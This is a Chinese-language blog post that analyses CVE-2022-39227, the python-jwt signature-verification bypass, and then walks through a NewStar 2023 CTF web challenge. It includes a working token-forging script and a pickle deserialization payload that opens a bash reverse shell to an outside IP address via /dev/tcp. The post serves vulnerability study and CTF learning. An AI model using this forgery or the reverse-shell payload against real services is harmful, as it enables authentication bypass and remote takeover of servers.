重要提醒:Python-JWT漏洞CVE-2022-39227公告

文章目录

  • 前言
  • 影响版本
  • 漏洞分析
  • Newstar2023 Week5
  • 总结

  • 前言

    在Asal1n师傅的随口一说之下,说newstar week5出了一道祥云杯一样的CVE,于是自己也是跑去看了一下,确实是自己不知道的一个CVE漏洞,于是就从这道题学习到了python-jwt库中的身份验证绕过漏洞,顺带做了一下简单的代码分析。

    影响版本

    python-jwt < 3.3.4

    漏洞分析

    这个漏洞造成的原因更像是库的作者在编写代码的时候疏忽导致的,使得验证的payload内容和返回的payload内容并不是一个payload导致的,下面来简单分析一下。

    先给出github上作者漏洞修补的大致payload,利用payload进行测试,如下:
    python-jwt库地址

    from json import *
    from python_jwt import *
    from jwcrypto import jwk
    
    payload = {'role': "guest"}
    key = jwk.JWK.generate(kty='oct', size=256)
    jwt_json = generate_jwt(payload, key, 'HS256', timedelta(minutes=60))
    [header, payload, signature] = jwt_json.split('.')
    parsed_payload = loads(base64url_decode(payload))
    parsed_payload['role'] = "admin"
    fake = base64url_encode((dumps(parsed_payload,separators=(',', ':'))))#这里separators就是消除了空格,不加似乎也并不影响漏洞。
    fake_jwt = '{" ' + header + '.' + fake + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
    print(fake_jwt)
    token = verify_jwt(fake_jwt, key, ['HS256'])
    print(token)
    
    1. 首先是刚进入前面的代码。
    #判断是否存在可用的签名算法
        if allowed_algs is None:
            allowed_algs = []
    #如果可用的签名算法不是列表,抛出异常
        if not isinstance(allowed_algs, list):
            # jwcrypto only supports list of allowed algorithms
            raise _JWTError('allowed_algs must be a list')
    #以.分割jwt的三部分
        header, claims, _ = jwt.split('.')
    #取出头部分进行base64解码和json解析
        parsed_header = json_decode(base64url_decode(header))
    #取出头部算法中的alg参数,此处就是PS256,如果为空或算法不允许,则抛出异常
        alg = parsed_header.get('alg')
        if alg is None:
            raise _JWTError('alg header not present')
        if alg not in allowed_algs:
            raise _JWTError('algorithm not allowed: ' + alg)
    #ignore_not_implemented默认就是False,遍历头部的键,是否在被JWS所支持,不支持抛出异常
        if not ignore_not_implemented:
            for k in parsed_header:
                if k not in JWSHeaderRegistry:
                    raise _JWTError('unknown header: ' + k)
                if not JWSHeaderRegistry[k].supported:
                    raise _JWTError('header not implemented: ' + k)
    #对签名进行验证,对jwt进行解析,这里传入的jwt为原始的jwt字段
        if pub_key:
            token = JWS()
            token.allowed_algs = allowed_algs
            token.deserialize(jwt, pub_key)
    
    

    这里的base64url_decode()是一个用于解码Base64 URL安全编码的函数。
    Base64 URL安全编码将标准的Base64编码进行了一些修改,以便在URL中传输时不会产生冲突。
    具体而言,它使用"-“替换”+“,使用”_“替换”/“,并且将结尾的”="去除,并且会忽略掉不是base64的字符。

    1. 进入到deserialize中对签名进行验证,代码如下:
        def deserialize(self, raw_jws, key=None, alg=None):
            self.objects = {}
            o = {}
            try:
                try:
    			 #对传入的原始的jwt进行json解析
                    djws = json_decode(raw_jws)
    				#判断是否有多个签名,有则取出签名存放到列表当中
                    if 'signatures' in djws:
                        o['signatures'] = []
                        for s in djws['signatures']:
                            os = self._deserialize_signature(s)
                            o['signatures'].append(os)
                            self._deserialize_b64(o, os.get('protected'))
    				#单个签名的情况,直接从原始的jwt中取出签名字段,并且将protected以及header赋值给o对象返回
                    else:
                        o = self._deserialize_signature(djws)
                        self._deserialize_b64(o, o.get('protected'))#是否继续base64解码
    
                    if 'payload' in djws:#解析payload字段
                        if o.get('b64', True):
                            o['payload'] = base64url_decode(str(djws['payload']))
                        else:
                            o['payload'] = djws['payload']
    
                except ValueError:#如果json解析异常,则直接以. 分割,提取出三个部分分别赋值
                    c = raw_jws.split('.')
                    if len(c) != 3:
                        raise InvalidJWSObject('Unrecognized'
                                               ' representation') from None
                    p = base64url_decode(str(c[0]))
                    if len(p) > 0:
                        o['protected'] = p.decode('utf-8')
                        self._deserialize_b64(o, o['protected'])
                    o['payload'] = base64url_decode(str(c[1]))
                    o['signature'] = base64url_decode(str(c[2]))
    
                self.objects = o #将o赋值给objects对象
    
            except Exception as e:  # pylint: disable=broad-except
                raise InvalidJWSObject('Invalid format') from e
    
            if key:
                self.verify(key, alg)#将签名算法和key传入verify函数中
    
    

    file

    file

    1. verify()函数如下:
        def verify(self, key, alg=None, detached_payload=None):
            self.verifylog = []
    		#默认验证是不通过的
            self.objects['valid'] = False
            obj = self.objects
            missingkey = False
            if 'signature' in obj:
                payload = self._get_obj_payload(obj, detached_payload)#直接提取出payload部分
                #直至这里,传入的解析部分还是原本正常的jwt的字符串,所以_verify也是通过的,将验证生效设置为了true
    			try:
                    self._verify(alg, key,
                                 payload,
                                 obj['signature'],
                                 obj.get('protected', None),
                                 obj.get('header', None))
                    obj['valid'] = True
                except Exception as e:  # pylint: disable=broad-except
                    if isinstance(e, JWKeyNotFound):
                        missingkey = True
                    self.verifylog.append('Failed: [%s]' % repr(e))
    		#多个签名的情况
            elif 'signatures' in obj:
                payload = self._get_obj_payload(obj, detached_payload)
                for o in obj['signatures']:
                    try:
                        self._verify(alg, key,
                                     payload,
                                     o['signature'],
                                     o.get('protected', None),
                                     o.get('header', None))
                        # Ok if at least one verifies
                        obj['valid'] = True
                    except Exception as e:  # pylint: disable=broad-except
                        if isinstance(e, JWKeyNotFound):
                            missingkey = True
                        self.verifylog.append('Failed: [%s]' % repr(e))
            else:
                raise InvalidJWSSignature('No signatures available')
    		#如果签名验证不通过,抛出异常
            if not self.is_valid:
                if missingkey:
                    raise JWKeyNotFound('No working key found in key set')
                raise InvalidJWSSignature('Verification failed for all '
                                          'signatures' + repr(self.verifylog))
    
    

    这里经过验证码后的token其实是原本正常的jwt,跟伪造的payload还没有关系

    file

    1. 代码继续往下走
    #json解析.分割出来的中间部分,即我们而已构造的payload
     	parsed_claims = json_decode(base64url_decode(claims))
    	#获取一些时间参数
        utcnow = datetime.utcnow()
        now = timegm(utcnow.utctimetuple())
    #从header头中获取到类型JWT,并进行一些判断,不为JWT抛出异常
        typ = parsed_header.get('typ')
        if typ is None:
            if not checks_optional:
                raise _JWTError('typ header not present')
        elif typ != 'JWT':
            raise _JWTError('typ header is not JWT')
    #从fakepayload中获取到iat的值即时间戳,判断令牌的签发时间是否有效
        iat = parsed_claims.get('iat')
        if iat is None:
            if not checks_optional:
                raise _JWTError('iat claim not present')
        elif iat > timegm((utcnow + iat_skew).utctimetuple()):
            raise _JWTError('issued in the future')
    #获取jwt令牌的生效时间,此时是否有效
        nbf = parsed_claims.get('nbf')
        if nbf is None:
            if not checks_optional:
                raise _JWTError('nbf claim not present')
        elif nbf > now:
            raise _JWTError('not yet valid')
    # 获取到令牌的过期即有效截止时间,判断令牌是否有效,如果小于现在时间,则过期
        exp = parsed_claims.get('exp')
        if exp is None:
            if not checks_optional:
                raise _JWTError('exp claim not present')
        elif exp <= now:
            raise _JWTError('expired')
    # 返回.分割后的头部和中间部分即我们的fakepayload
        return parsed_header, parsed_claims
    
    

    可以看出,在验证令牌的时候使用的是正常的JWT,而返回的却是以.分割的传入jwt的中间部分和头部,使得解析返回的payload和验证签名的pauload并不是一个payload,导致了身份绕过。

    Newstar2023 Week5

    题目给了源码如下:

    # -*- coding: utf-8 -*-
    import base64
    import string
    import random
    from flask import *
    import jwcrypto.jwk as jwk
    import pickle
    from python_jwt import *
    
    app = Flask(__name__)
    
    
    def generate_random_string(length=16):
        characters = string.ascii_letters + string.digits  # 包含字母和数字
        random_string = ''.join(random.choice(characters) for _ in range(length))
        return random_string
    
    
    app.config['SECRET_KEY'] = generate_random_string(16)
    key = jwk.JWK.generate(kty='RSA', size=2048)
    
    
    @app.route("/")
    def index():
        payload = request.args.get("token")
        if payload:
            token = verify_jwt(payload, key, ['PS256'])
            print(token)
            session["role"] = token[1]['role']
            return render_template('index.html')
        else:
            session["role"] = "guest"
            user = {"username": "boogipop", "role": "guest"}
            jwt = generate_jwt(user, key, 'PS256', timedelta(minutes=60))
            return jwt
    
    
    @app.route("/pickle")
    def unser():
        if session["role"] == "admin":
            pickle.loads(base64.b64decode(request.args.get("pickle")))
            return 'success'
        else:
            return 'fail'
    
    
    if __name__ == "__main__":
        app.run(host="0.0.0.0", port=5000, debug=True)
    
    

    题目的思路也是十分简单,通过伪造JWT,使得返回来的fake_payload中第二部分的role和admin,然后进行pickle反序列化即可。

    1. 利用原题目guest的jwwt直接进行伪造,绕过身份验证

    file

    from json import loads, dumps
    from jwcrypto.common import base64url_encode, base64url_decode
    
    
    def topic(topic):
        [header, payload, signature] = topic.split('.')
        parsed_payload = loads(base64url_decode(payload))
        print(parsed_payload)
        parsed_payload["role"] = "admin"
        print(dumps(parsed_payload, separators=(',', ':')))
        fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
        print(fake_payload)
        return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '
    
    
    print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2OTkzNjkyMzcsImlhdCI6MTY5OTM2NTYzNywianRpIjoiTUV0SEJKX1JZeVR3MmhnUmZMcnFsdyIsIm5iZiI6MTY5OTM2NTYzNywicm9sZSI6Imd1ZXN0IiwidXNlcm5hbWUiOiJib29naXBvcCJ9.nw0s5c4lL0GtUBb7IJTbIhVTE7kzNg7s4l93PrhWZmYKuxWCyZmi7cKWE63Tv3Z6sdUQVp_7IlM8yiY32mNSOwRHCADWllFo18bmlXVri_qdWR-CCVkVi6npIliEBXl_Hbpnh64dCIQuY13-gr0Y412svenGADO-uubqxT3Ml7dlpnaDZ7F06ISkg_m4syc0DQpKKuQv4xFshMYHgaxCCkLpJCMHScIxSjSjoxpD3LnNjYRXgVue8R4TcZ75ZWgaSmkNUmHUrizdTFyi0GVutnaT1Nw4yZKkS5DZxAVUYqcARLUSGvWmt1pZnyny0eR23q7Z8X7Mw-LytE-XfmkAFQ'))
    
    
    
    1. 这里返回的session就是admin的session

    file

    1. 触发pickle反序列化,反弹shell
    import base64
    
    p=b"(cos\nsystem\nS'bash -c \"bash -i >& /dev/tcp/120.79.29.170/5555 0>&1\"'\no"
    payload=base64.b64encode(p)
    print(payload)
    
    

    file

    总结

    JWT的话题总是不息的,包括一些空认证等,nodejs中的数组绕过等等,漏洞也是频出。

    物联沃分享整理
    物联沃-IOTWORD物联网 » 重要提醒:Python-JWT漏洞CVE-2022-39227公告

    发表回复